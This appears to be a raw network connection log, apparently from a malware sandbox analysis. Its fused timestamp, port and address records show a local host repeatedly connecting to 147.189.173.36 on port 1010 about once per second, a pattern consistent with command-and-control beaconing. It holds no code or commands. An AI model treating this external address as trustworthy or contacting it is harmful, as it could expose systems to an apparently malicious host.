                                            Nov 1, 2024 06:24:48.648010015 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.688682079 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.694251060 CET101050188147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:48.694312096 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.963078022 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.968014002 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:48.968085051 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.057145119 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.062028885 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.062078953 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.066926956 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.154191017 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.165647030 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.165712118 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.171343088 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.653784037 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.700644016 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.703486919 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.703845978 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.708945990 CET101050189147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.709088087 CET501891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.810868025 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.816507101 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.818814993 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.830991030 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.837045908 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:49.842993975 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:49.847790003 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.531786919 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.575767994 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.575870991 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.576457024 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.585221052 CET101050190147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.585314989 CET501901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.685792923 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.691318989 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.691391945 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.730231047 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.735019922 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:50.735081911 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:50.740319967 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.368742943 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.401834965 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.401998997 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.550615072 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.555780888 CET101050191147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.555835009 CET501911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.803153992 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.807986975 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.808075905 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.844677925 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.849478006 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:51.850785971 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:51.855601072 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.501547098 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.534712076 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.534815073 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.535485029 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.540858030 CET101050192147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.541002035 CET501921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.654668093 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.659811974 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.659887075 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.690592051 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.697684050 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:52.697743893 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:52.707436085 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.349844933 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.382580996 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.382679939 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.383254051 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.388994932 CET101050193147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.389072895 CET501931010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.498303890 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.503839970 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.503917933 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.526141882 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.532383919 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:53.532452106 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:53.540141106 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.211843014 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.252677917 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.252768993 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.253509045 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.258677959 CET101050194147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.258886099 CET501941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.373162031 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.381783962 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.381899118 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.494791031 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.499856949 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:54.499919891 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:54.504769087 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.058101892 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.091116905 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.091190100 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.092123985 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.098037004 CET101050195147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.098107100 CET501951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.205297947 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.210244894 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.210346937 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.246265888 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.251092911 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.251178980 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.256042004 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.902666092 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.935647964 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.935760975 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.936613083 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:55.941749096 CET101050196147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:55.941838026 CET501961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.046935081 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.051995993 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.052134991 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.066900015 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.071732044 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.071927071 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.077241898 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.740148067 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.773514986 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.773566008 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.774525881 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.780349016 CET101050197147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.780396938 CET501971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.889188051 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.894076109 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.894148111 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.925017118 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.929780960 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:56.929831028 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:56.934669018 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.568276882 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.601099968 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.601228952 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.601887941 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.607014894 CET101050198147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.607095957 CET501981010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.718882084 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.724042892 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.727323055 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.854953051 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.860025883 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:57.860416889 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:57.865474939 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.403747082 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.435455084 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.442966938 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.469875097 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.476833105 CET101050199147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.476943970 CET501991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.596714020 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.601687908 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.601897001 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.827717066 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.833843946 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:58.833882093 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:58.840472937 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.266997099 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.300540924 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.300585032 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.301276922 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.306545019 CET101050200147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.306677103 CET502001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.420239925 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.425072908 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.425143957 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.446712971 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.451637983 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:59.451725960 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:59.456562996 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.107464075 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.139739037 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.139810085 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.140518904 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.145916939 CET101050201147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.145992994 CET502011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.248640060 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.253592968 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.253674030 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.265403032 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.270344019 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.270411015 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.275254011 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.929620028 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.962687969 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.962728024 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.963818073 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:00.968887091 CET101050202147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:00.969443083 CET502021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:01.349072933 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:01.353884935 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:01.353960991 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:01.527576923 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:01.532504082 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:01.532557011 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:01.537441015 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.034337044 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.067548990 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.067631006 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.068309069 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.075264931 CET101050203147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.075320959 CET502031010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.193864107 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.200352907 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.200469017 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.282607079 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.287691116 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.287748098 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.292464972 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.907187939 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.940761089 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.940810919 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.941591978 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:02.946669102 CET101050204147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:02.946719885 CET502041010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.061240911 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.066148996 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.066236019 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.097405910 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.102236032 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.103267908 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.108078003 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.757435083 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.790281057 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.794625044 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.798959017 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.805227995 CET101050205147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:03.810906887 CET502051010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:03.998733997 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.003679037 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.010854006 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.318555117 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.323528051 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.323640108 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.328481913 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.692013979 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.723150969 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.723200083 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.723977089 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.730048895 CET101050206147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.730092049 CET502061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.842547894 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.847484112 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.847538948 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.909795046 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.915441990 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:04.915509939 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:04.920314074 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.526163101 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.559214115 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.559288979 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.559906006 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.565943003 CET101050207147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.566009045 CET502071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.671031952 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.675973892 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.676229954 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.855168104 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.862003088 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:05.862087965 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:05.867564917 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:06.349220037 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:06.382644892 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:06.382802963 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:06.383488894 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:06.388823032 CET101050208147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:06.388933897 CET502081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:06.524279118 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:06.529258966 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:06.529469967 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.095129013 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.099967957 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.100020885 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.104870081 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.273633957 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.304125071 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.304182053 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.304802895 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.314094067 CET101050209147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.314143896 CET502091010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.420438051 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.425436974 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.425518036 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.434701920 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.440311909 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.440395117 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.446249008 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.967012882 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.972676039 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:07.974816084 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:07.980758905 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:08.108824968 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:08.125910044 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:08.125973940 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:08.126564026 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:08.132618904 CET101050210147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:08.132697105 CET502101010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:08.232748032 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.219110966 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.219252110 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.239340067 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.245316982 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.245383978 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.251364946 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.916105986 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.949922085 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.949996948 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.950805902 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:09.956127882 CET101050211147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:09.956196070 CET502111010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.060914040 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.066073895 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.067257881 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.098934889 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.103825092 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.106939077 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.111805916 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.745964050 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.785911083 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.786007881 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.786571980 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.792431116 CET101050212147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.792490959 CET502121010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.904553890 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.909543991 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.909617901 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.943000078 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.948904037 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:10.948959112 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:10.955107927 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.616837025 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.650075912 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.650243998 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.650876999 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.656239986 CET101050213147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.656297922 CET502131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.764805079 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.769691944 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.769779921 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.957779884 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.962749958 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:11.964833975 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:11.969721079 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.474453926 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.507698059 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.507961988 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.511200905 CET502141010192.168.2.4147.189.173.36
